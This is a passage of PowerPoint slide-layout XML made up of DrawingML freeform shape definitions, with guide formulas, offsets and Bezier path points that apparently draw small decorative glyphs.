                <a:gd name="T93" fmla="*/ 12 h 42"/>
                <a:gd name="T94" fmla="*/ 55 w 68"/>
                <a:gd name="T95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8" h="42">
                  <a:moveTo>
                    <a:pt x="64" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="36"/>
                    <a:pt x="56" y="35"/>
                    <a:pt x="53" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="35"/>
                    <a:pt x="47" y="34"/>
                    <a:pt x="43" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="30"/>
                    <a:pt x="54" y="29"/>
                    <a:pt x="55" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="28"/>
                    <a:pt x="57" y="27"/>
                    <a:pt x="58" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="24"/>
                    <a:pt x="62" y="21"/>
                    <a:pt x="62" y="16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7" y="12"/>
                    <a:pt x="68" y="10"/>
                    <a:pt x="68" y="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21"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="9" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="27"/>
                    <a:pt x="14" y="29"/>
                    <a:pt x="16" y="30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1" y="34"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="12" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="35"/>
                    <a:pt x="5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2" y="42"/>
                    <a:pt x="21" y="41"/>
                    <a:pt x="27" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="39"/>
                    <a:pt x="31" y="38"/>
                    <a:pt x="34" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="38"/>
                    <a:pt x="39" y="39"/>
                    <a:pt x="41" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="40"/>
                    <a:pt x="49" y="41"/>
                    <a:pt x="54" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="42"/>
                    <a:pt x="63" y="42"/>
                    <a:pt x="68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6" y="36"/>
                    <a:pt x="64" y="36"/>
                    <a:pt x="64" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="20"/>
                    <a:pt x="53" y="22"/>
                    <a:pt x="49" y="24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7" y="23"/>
                    <a:pt x="16" y="22"/>
                    <a:pt x="15" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="20"/>
                    <a:pt x="14" y="19"/>
                    <a:pt x="14" y="17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55" y="12"/>
                    <a:pt x="55" y="12"/>
                    <a:pt x="55" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55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8" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8081573" y="-437788"/>
              <a:ext cx="56078" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 34"/>
                <a:gd name="T1" fmla="*/ 7 h 58"/>
                <a:gd name="T2" fmla="*/ 14 w 34"/>
                <a:gd name="T3" fmla="*/ 7 h 58"/>
                <a:gd name="T4" fmla="*/ 14 w 34"/>
                <a:gd name="T5" fmla="*/ 51 h 58"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 51 h 58"/>
                <a:gd name="T8" fmla="*/ 9 w 34"/>
                <a:gd name="T9" fmla="*/ 15 h 58"/>
                <a:gd name="T10" fmla="*/ 2 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 58"/>
                <a:gd name="T12" fmla="*/ 2 w 34"/>
                <a:gd name="T13" fmla="*/ 51 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 34"/>
                <a:gd name="T15" fmla="*/ 51 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 34"/>
                <a:gd name="T17" fmla="*/ 58 h 58"/>
                <a:gd name="T18" fmla="*/ 27 w 34"/>
                <a:gd name="T19" fmla="*/ 58 h 58"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 51 h 58"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 51 h 58"/>
                <a:gd name="T24" fmla="*/ 21 w 34"/>
                <a:gd name="T25" fmla="*/ 51 h 58"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 29 h 58"/>
                <a:gd name="T28" fmla="*/ 34 w 34"/>
                <a:gd name="T29" fmla="*/ 29 h 58"/>
                <a:gd name="T30" fmla="*/ 34 w 34"/>
                <a:gd name="T31" fmla="*/ 22 h 58"/>
                <a:gd name="T32" fmla="*/ 21 w 34"/>
                <a:gd name="T33" fmla="*/ 22 h 58"/>
                <a:gd name="T34" fmla="*/ 21 w 34"/>
                <a:gd name="T35" fmla="*/ 7 h 58"/>
                <a:gd name="T36" fmla="*/ 27 w 34"/>
                <a:gd name="T37" fmla="*/ 7 h 58"/>
                <a:gd name="T38" fmla="*/ 34 w 34"/>
                <a:gd name="T39" fmla="*/ 1 h 58"/>
                <a:gd name="T40" fmla="*/ 34 w 34"/>
                <a:gd name="T41" fmla="*/ 0 h 58"/>
                <a:gd name="T42" fmla="*/ 0 w 34"/>
                <a:gd name="T43" fmla="*/ 0 h 58"/>
                <a:gd name="T44" fmla="*/ 0 w 34"/>
                <a:gd name="T45" fmla="*/ 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58">
                  <a:moveTo>
                    <a:pt x="0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1" y="58"/>
                    <a:pt x="34" y="55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31" y="7"/>
                    <a:pt x="34" y="4"/>
                    <a:pt x="34" y="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9" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8137651" y="-440903"/>
              <a:ext cx="58415" cy="101252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 35"/>
                <a:gd name="T1" fmla="*/ 29 h 60"/>
                <a:gd name="T2" fmla="*/ 32 w 35"/>
                <a:gd name="T3" fmla="*/ 12 h 60"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 60"/>
                <a:gd name="T6" fmla="*/ 35 w 35"/>
                <a:gd name="T7" fmla="*/ 5 h 60"/>
                <a:gd name="T8" fmla="*/ 14 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 60"/>
                <a:gd name="T10" fmla="*/ 15 w 35"/>
                <a:gd name="T11" fmla="*/ 0 h 60"/>
                <a:gd name="T12" fmla="*/ 7 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 60"/>
                <a:gd name="T14" fmla="*/ 7 w 35"/>
                <a:gd name="T15" fmla="*/ 1 h 60"/>
                <a:gd name="T16" fmla="*/ 3 w 35"/>
                <a:gd name="T17" fmla="*/ 12 h 60"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 14 h 60"/>
                <a:gd name="T20" fmla="*/ 0 w 35"/>
                <a:gd name="T21" fmla="*/ 14 h 60"/>
                <a:gd name="T22" fmla="*/ 0 w 35"/>
                <a:gd name="T23" fmla="*/ 21 h 60"/>
                <a:gd name="T24" fmla="*/ 1 w 35"/>
                <a:gd name="T25" fmla="*/ 21 h 60"/>
                <a:gd name="T26" fmla="*/ 8 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 60"/>
                <a:gd name="T28" fmla="*/ 12 w 35"/>
                <a:gd name="T29" fmla="*/ 12 h 60"/>
                <a:gd name="T30" fmla="*/ 24 w 35"/>
                <a:gd name="T31" fmla="*/ 12 h 60"/>
                <a:gd name="T32" fmla="*/ 23 w 35"/>
                <a:gd name="T33" fmla="*/ 29 h 60"/>
                <a:gd name="T34" fmla="*/ 19 w 35"/>
                <a:gd name="T35" fmla="*/ 40 h 60"/>
                <a:gd name="T36" fmla="*/ 15 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 60"/>
                <a:gd name="T38" fmla="*/ 12 w 35"/>
                <a:gd name="T39" fmla="*/ 20 h 60"/>
                <a:gd name="T40" fmla="*/ 12 w 35"/>
                <a:gd name="T41" fmla="*/ 20 h 60"/>
                <a:gd name="T42" fmla="*/ 5 w 35"/>
                <a:gd name="T43" fmla="*/ 20 h 60"/>
                <a:gd name="T44" fmla="*/ 5 w 35"/>
                <a:gd name="T45" fmla="*/ 20 h 60"/>
                <a:gd name="T46" fmla="*/ 11 w 35"/>
                <a:gd name="T47" fmla="*/ 40 h 60"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 46 h 60"/>
                <a:gd name="T50" fmla="*/ 3 w 35"/>
                <a:gd name="T51" fmla="*/ 53 h 60"/>
                <a:gd name="T52" fmla="*/ 3 w 35"/>
                <a:gd name="T53" fmla="*/ 53 h 60"/>
                <a:gd name="T54" fmla="*/ 3 w 35"/>
                <a:gd name="T55" fmla="*/ 60 h 60"/>
                <a:gd name="T56" fmla="*/ 3 w 35"/>
                <a:gd name="T57" fmla="*/ 60 h 60"/>
                <a:gd name="T58" fmla="*/ 11 w 35"/>
                <a:gd name="T59" fmla="*/ 57 h 60"/>
                <a:gd name="T60" fmla="*/ 19 w 35"/>
                <a:gd name="T61" fmla="*/ 51 h 60"/>
                <a:gd name="T62" fmla="*/ 25 w 35"/>
                <a:gd name="T63" fmla="*/ 55 h 60"/>
                <a:gd name="T64" fmla="*/ 34 w 35"/>
                <a:gd name="T65" fmla="*/ 60 h 60"/>
                <a:gd name="T66" fmla="*/ 35 w 35"/>
                <a:gd name="T67" fmla="*/ 60 h 60"/>
                <a:gd name="T68" fmla="*/ 35 w 35"/>
                <a:gd name="T69" fmla="*/ 53 h 60"/>
                <a:gd name="T70" fmla="*/ 35 w 35"/>
                <a:gd name="T71" fmla="*/ 53 h 60"/>
                <a:gd name="T72" fmla="*/ 24 w 35"/>
                <a:gd name="T73" fmla="*/ 46 h 60"/>
                <a:gd name="T74" fmla="*/ 28 w 35"/>
                <a:gd name="T75" fmla="*/ 38 h 60"/>
                <a:gd name="T76" fmla="*/ 30 w 35"/>
                <a:gd name="T77" fmla="*/ 2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" h="60">
                  <a:moveTo>
                    <a:pt x="30" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="24"/>
                    <a:pt x="31" y="18"/>
                    <a:pt x="32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7"/>
                    <a:pt x="4" y="11"/>
                    <a:pt x="3" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="13"/>
                    <a:pt x="2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4" y="21"/>
                    <a:pt x="6" y="19"/>
                    <a:pt x="8" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="16"/>
                    <a:pt x="11" y="14"/>
                    <a:pt x="12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21"/>
                    <a:pt x="23" y="26"/>
                    <a:pt x="23" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="21" y="36"/>
                    <a:pt x="19" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="37"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="15" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="29"/>
                    <a:pt x="13" y="25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9"/>
                    <a:pt x="9" y="36"/>
                    <a:pt x="11" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="41"/>
                    <a:pt x="13" y="43"/>
                    <a:pt x="14" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="49"/>
                    <a:pt x="7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6" y="59"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="11" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="55"/>
                    <a:pt x="16" y="54"/>
                    <a:pt x="19" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="53"/>
                    <a:pt x="23" y="54"/>
                    <a:pt x="25" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="57"/>
                    <a:pt x="30" y="58"/>
                    <a:pt x="34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0" y="51"/>
                    <a:pt x="27" y="49"/>
                    <a:pt x="24" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="43"/>
                    <a:pt x="27" y="40"/>
                    <a:pt x="28" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="35"/>
                    <a:pt x="30" y="32"/>
                    <a:pt x="3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0" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-414422"/>
              <a:ext cx="113713" cy="74770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 39 w 68"/>
                <a:gd name="T1" fmla="*/ 21 h 44"/>
                <a:gd name="T2" fmla="*/ 62 w 68"/>
                <a:gd name="T3" fmla="*/ 21 h 44"/>
                <a:gd name="T4" fmla="*/ 68 w 68"/>
                <a:gd name="T5" fmla="*/ 15 h 44"/>
                <a:gd name="T6" fmla="*/ 68 w 68"/>
                <a:gd name="T7" fmla="*/ 13 h 44"/>
                <a:gd name="T8" fmla="*/ 39 w 68"/>
                <a:gd name="T9" fmla="*/ 13 h 44"/>
                <a:gd name="T10" fmla="*/ 39 w 68"/>
                <a:gd name="T11" fmla="*/ 0 h 44"/>
                <a:gd name="T12" fmla="*/ 31 w 68"/>
                <a:gd name="T13" fmla="*/ 0 h 44"/>
                <a:gd name="T14" fmla="*/ 31 w 68"/>
                <a:gd name="T15" fmla="*/ 36 h 44"/>
                <a:gd name="T16" fmla="*/ 16 w 68"/>
                <a:gd name="T17" fmla="*/ 36 h 44"/>
                <a:gd name="T18" fmla="*/ 16 w 68"/>
                <a:gd name="T19" fmla="*/ 10 h 44"/>
                <a:gd name="T20" fmla="*/ 8 w 68"/>
                <a:gd name="T21" fmla="*/ 10 h 44"/>
                <a:gd name="T22" fmla="*/ 8 w 68"/>
                <a:gd name="T23" fmla="*/ 36 h 44"/>
                <a:gd name="T24" fmla="*/ 0 w 68"/>
                <a:gd name="T25" fmla="*/ 36 h 44"/>
                <a:gd name="T26" fmla="*/ 0 w 68"/>
                <a:gd name="T27" fmla="*/ 44 h 44"/>
                <a:gd name="T28" fmla="*/ 62 w 68"/>
                <a:gd name="T29" fmla="*/ 44 h 44"/>
                <a:gd name="T30" fmla="*/ 68 w 68"/>
                <a:gd name="T31" fmla="*/ 38 h 44"/>
                <a:gd name="T32" fmla="*/ 68 w 68"/>
                <a:gd name="T33" fmla="*/ 36 h 44"/>
                <a:gd name="T34" fmla="*/ 39 w 68"/>
                <a:gd name="T35" fmla="*/ 36 h 44"/>
                <a:gd name="T36" fmla="*/ 39 w 68"/>
                <a:gd name="T3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" h="44">
                  <a:moveTo>
                    <a:pt x="39" y="21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5" y="21"/>
                    <a:pt x="68" y="18"/>
                    <a:pt x="68" y="15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2" y="44"/>
                    <a:pt x="62" y="44"/>
                    <a:pt x="62" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="44"/>
                    <a:pt x="68" y="41"/>
                    <a:pt x="68" y="38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39" y="36"/>
                    <a:pt x="39" y="36"/>
                    <a:pt x="39" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39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1" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-440903"/>
              <a:ext cx="115271" cy="40501"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 69"/>
                <a:gd name="T1" fmla="*/ 17 h 24"/>
                <a:gd name="T2" fmla="*/ 63 w 69"/>
                <a:gd name="T3" fmla="*/ 16 h 24"/>
                <a:gd name="T4" fmla="*/ 60 w 69"/>
                <a:gd name="T5" fmla="*/ 13 h 24"/>
                <a:gd name="T6" fmla="*/ 56 w 69"/>
                <a:gd name="T7" fmla="*/ 7 h 24"/>
                <a:gd name="T8" fmla="*/ 52 w 69"/>
                <a:gd name="T9" fmla="*/ 2 h 24"/>
                <a:gd name="T10" fmla="*/ 44 w 69"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
                <a:gd name="T12" fmla="*/ 22 w 69"/>
                <a:gd name="T13" fmla="*/ 0 h 24"/>
                <a:gd name="T14" fmla="*/ 11 w 69"/>
                <a:gd name="T15" fmla="*/ 7 h 24"/>
                <a:gd name="T16" fmla="*/ 8 w 69"/>
                <a:gd name="T17" fmla="*/ 13 h 24"/>
                <a:gd name="T18" fmla="*/ 4 w 69"/>
                <a:gd name="T19" fmla="*/ 17 h 24"/>
                <a:gd name="T20" fmla="*/ 0 w 69"/>
                <a:gd name="T21" fmla="*/ 17 h 24"/>
                <a:gd name="T22" fmla="*/ 0 w 69"/>
                <a:gd name="T23" fmla="*/ 17 h 24"/>
                <a:gd name="T24" fmla="*/ 0 w 69"/>
                <a:gd name="T25" fmla="*/ 24 h 24"/>
                <a:gd name="T26" fmla="*/ 0 w 69"/>
                <a:gd name="T27" fmla="*/ 24 h 24"/>
                <a:gd name="T28" fmla="*/ 8 w 69"/>
                <a:gd name="T29" fmla="*/ 23 h 24"/>
                <a:gd name="T30" fmla="*/ 15 w 69"/>
                <a:gd name="T31" fmla="*/ 17 h 24"/>
                <a:gd name="T32" fmla="*/ 18 w 69"/>
                <a:gd name="T33" fmla="*/ 10 h 24"/>
                <a:gd name="T34" fmla="*/ 20 w 69"/>
                <a:gd name="T35" fmla="*/ 8 h 24"/>
                <a:gd name="T36" fmla="*/ 23 w 69"/>
                <a:gd name="T37" fmla="*/ 8 h 24"/>
                <a:gd name="T38" fmla="*/ 44 w 69"/>
                <a:gd name="T39" fmla="*/ 8 h 24"/>
                <a:gd name="T40" fmla="*/ 48 w 69"/>
                <a:gd name="T41" fmla="*/ 8 h 24"/>
                <a:gd name="T42" fmla="*/ 50 w 69"/>
                <a:gd name="T43" fmla="*/ 10 h 24"/>
                <a:gd name="T44" fmla="*/ 54 w 69"/>
                <a:gd name="T45" fmla="*/ 18 h 24"/>
                <a:gd name="T46" fmla="*/ 59 w 69"/>
                <a:gd name="T47" fmla="*/ 23 h 24"/>
                <a:gd name="T48" fmla="*/ 68 w 69"/>
                <a:gd name="T49" fmla="*/ 24 h 24"/>
                <a:gd name="T50" fmla="*/ 69 w 69"/>
                <a:gd name="T51" fmla="*/ 24 h 24"/>
                <a:gd name="T52" fmla="*/ 69 w 69"/>
                <a:gd name="T53" fmla="*/ 17 h 24"/>
                <a:gd name="T54" fmla="*/ 68 w 69"/>
                <a:gd name="T55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9" h="24">
                  <a:moveTo>
                    <a:pt x="68" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="17"/>
                    <a:pt x="64" y="17"/>
                    <a:pt x="63" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="16"/>
                    <a:pt x="60" y="15"/>
                    <a:pt x="60" y="13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5" y="4"/>
                    <a:pt x="54" y="3"/>
                    <a:pt x="52" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="4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3"/>
                    <a:pt x="11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6" y="16"/>
                    <a:pt x="4" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="17"/>
                    <a:pt x="2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24"/>
                    <a:pt x="6" y="24"/>
                    <a:pt x="8" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="22"/>
                    <a:pt x="13" y="20"/>
                    <a:pt x="15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19" y="9"/>
                    <a:pt x="20" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="8"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="23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6" y="8"/>
                    <a:pt x="47" y="8"/>
                    <a:pt x="48" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="8"/>
                    <a:pt x="49" y="9"/>
                    <a:pt x="50" y="10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20"/>
                    <a:pt x="57" y="22"/>
                    <a:pt x="59" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="24"/>
                    <a:pt x="64" y="24"/>
                    <a:pt x="68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69" y="17"/>
                    <a:pt x="69" y="17"/>
                    <a:pt x="69" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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" name="Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7600239" y="-267218"/>
              <a:ext cx="59972" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 36"/>
                <a:gd name="T1" fmla="*/ 20 h 35"/>
                <a:gd name="T2" fmla="*/ 10 w 36"/>
                <a:gd name="T3" fmla="*/ 19 h 35"/>
                <a:gd name="T4" fmla="*/ 18 w 36"/>
                <a:gd name="T5" fmla="*/ 20 h 35"/>
                <a:gd name="T6" fmla="*/ 14 w 36"/>
                <a:gd name="T7" fmla="*/ 29 h 35"/>
                <a:gd name="T8" fmla="*/ 16 w 36"/>
                <a:gd name="T9" fmla="*/ 33 h 35"/>
                <a:gd name="T10" fmla="*/ 2 w 36"/>
                <a:gd name="T11" fmla="*/ 35 h 35"/>
                <a:gd name="T12" fmla="*/ 9 w 36"/>
                <a:gd name="T13" fmla="*/ 29 h 35"/>
                <a:gd name="T14" fmla="*/ 5 w 36"/>
                <a:gd name="T15" fmla="*/ 23 h 35"/>
                <a:gd name="T16" fmla="*/ 1 w 36"/>
                <a:gd name="T17" fmla="*/ 20 h 35"/>
                <a:gd name="T18" fmla="*/ 9 w 36"/>
                <a:gd name="T19" fmla="*/ 8 h 35"/>
                <a:gd name="T20" fmla="*/ 12 w 36"/>
                <a:gd name="T21" fmla="*/ 0 h 35"/>
                <a:gd name="T22" fmla="*/ 19 w 36"/>
                <a:gd name="T23" fmla="*/ 8 h 35"/>
                <a:gd name="T24" fmla="*/ 12 w 36"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 13 w 36"/>
                <a:gd name="T27" fmla="*/ 12 h 35"/>
                <a:gd name="T28" fmla="*/ 17 w 36"/>
                <a:gd name="T29" fmla="*/ 18 h 35"/>
                <a:gd name="T30" fmla="*/ 12 w 36"/>
                <a:gd name="T31" fmla="*/ 18 h 35"/>
                <a:gd name="T32" fmla="*/ 9 w 36"/>
                <a:gd name="T33" fmla="*/ 13 h 35"/>
                <a:gd name="T34" fmla="*/ 0 w 36"/>
                <a:gd name="T35" fmla="*/ 17 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 36"/>
                <a:gd name="T37" fmla="*/ 11 h 35"/>
                <a:gd name="T38" fmla="*/ 2 w 36"/>
                <a:gd name="T39" fmla="*/ 3 h 35"/>
                <a:gd name="T40" fmla="*/ 7 w 36"/>
                <a:gd name="T41" fmla="*/ 6 h 35"/>
                <a:gd name="T42" fmla="*/ 2 w 36"/>
                <a:gd name="T43" fmla="*/ 3 h 35"/>
                <a:gd name="T44" fmla="*/ 11 w 36"/>
                <a:gd name="T45" fmla="*/ 28 h 35"/>
                <a:gd name="T46" fmla="*/ 8 w 36"/>
                <a:gd name="T47" fmla="*/ 23 h 35"/>
                <a:gd name="T48" fmla="*/ 17 w 36"/>
                <a:gd name="T49" fmla="*/ 1 h 35"/>
                <a:gd name="T50" fmla="*/ 15 w 36"/>
                <a:gd name="T51" fmla="*/ 7 h 35"/>
                <a:gd name="T52" fmla="*/ 17 w 36"/>
                <a:gd name="T53" fmla="*/ 1 h 35"/>
                <a:gd name="T54" fmla="*/ 26 w 36"/>
                <a:gd name="T55" fmla="*/ 1 h 35"/>
                <a:gd name="T56" fmla="*/ 35 w 36"/>
                <a:gd name="T57" fmla="*/ 7 h 35"/>
                <a:gd name="T58" fmla="*/ 33 w 36"/>
                <a:gd name="T59" fmla="*/ 9 h 35"/>
                <a:gd name="T60" fmla="*/ 36 w 36"/>
                <a:gd name="T61" fmla="*/ 32 h 35"/>
                <a:gd name="T62" fmla="*/ 27 w 36"/>
                <a:gd name="T63" fmla="*/ 28 h 35"/>
                <a:gd name="T64" fmla="*/ 17 w 36"/>
                <a:gd name="T65" fmla="*/ 33 h 35"/>
                <a:gd name="T66" fmla="*/ 21 w 36"/>
                <a:gd name="T67" fmla="*/ 14 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 36"/>
                <a:gd name="T69" fmla="*/ 14 h 35"/>
                <a:gd name="T70" fmla="*/ 30 w 36"/>
                <a:gd name="T71" fmla="*/ 9 h 35"/>
                <a:gd name="T72" fmla="*/ 23 w 36"/>
                <a:gd name="T73" fmla="*/ 10 h 35"/>
                <a:gd name="T74" fmla="*/ 30 w 36"/>
                <a:gd name="T75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" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="20"/>
                  </a:move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7" y="19"/>
                    <a:pt x="8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20"/>
                    <a:pt x="9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5"/>
                    <a:pt x="15" y="27"/>
                    <a:pt x="14" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="29"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="18" y="3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3" y="31"/>
                    <a:pt x="12" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="32"/>
                    <a:pt x="6" y="34"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="0" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="32"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="9" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="25"/>
                    <a:pt x="4" y="24"/>
                    <a:pt x="5" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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5" y="13"/>
                    <a:pt x="17" y="15"/>
                    <a:pt x="18" y="1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17"/>
                    <a:pt x="14" y="15"/>
                    <a:pt x="12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7" y="15"/>
                    <a:pt x="5" y="17"/>
                    <a:pt x="2" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="15"/>
                    <a:pt x="6" y="13"/>
                    <a:pt x="8" y="11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1" y="8"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2" y="3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5" y="3"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="7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3" y="4"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="26"/>
                    <a:pt x="9" y="27"/>
                    <a:pt x="11" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="15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7" y="24"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="6" y="25"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4"/>
                    <a:pt x="17" y="6"/>
                    <a:pt x="15" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="7"/>
                    <a:pt x="14" y="7"/>
                    <a:pt x="14" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="5"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
